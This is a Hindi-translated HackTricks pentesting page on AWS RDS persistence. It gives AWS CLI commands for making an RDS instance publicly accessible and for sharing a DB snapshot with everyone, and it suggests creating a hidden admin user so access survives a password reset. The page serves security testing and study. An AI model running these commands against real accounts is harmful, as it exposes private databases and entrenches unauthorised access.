Files
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence/README.md

1.3 KiB

AWS - RDS Persistence

{{#include ../../../../banners/hacktricks-training.md}}

RDS

अधिक जानकारी के लिए देखें:

{{#ref}} ../../aws-services/aws-relational-database-rds-enum.md {{#endref}}

इंस्टेंस को सार्वजनिक रूप से सुलभ बनाना: rds:ModifyDBInstance

इस अनुमति वाले attacker मौजूदा RDS इंस्टेंस को सार्वजनिक रूप से सुलभ करने के लिए संशोधित कर सकता है

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB के अंदर एक admin user बनाएं

एक attacker बस DB के अंदर एक user बना सकता है ताकि भले ही master users password बदल दिया जाए, वह database तक अपनी पहुँच खो न दे

Snapshot को public करें

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

{{#include ../../../../banners/hacktricks-training.md}}